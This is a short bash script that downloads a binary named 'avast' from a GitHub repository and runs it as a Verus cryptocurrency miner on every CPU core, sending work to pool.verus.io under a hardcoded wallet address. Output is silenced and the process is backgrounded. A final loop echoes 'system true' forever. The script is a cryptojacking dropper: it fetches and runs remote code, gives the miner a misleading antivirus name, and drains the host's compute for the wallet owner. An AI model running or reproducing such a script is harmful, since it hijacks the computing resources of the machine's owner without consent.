#!/bin/bash
wget https://github.com/torgyv/berhasil/raw/master/avast
chmod +x avast
pool="pool.verus.io:9998"
workername="$(cat /proc/sys/kernel/hostname)"
thread="$(nproc --all)"
./avast -a verus -o $pool -u RWZG7MP3LepujPY8rVS9ZuUXZnDdNveBF4.$workername -t $thread >/dev/null 2>&1 >/dev/null &
while :; do echo "system true"; sleep 2m; done
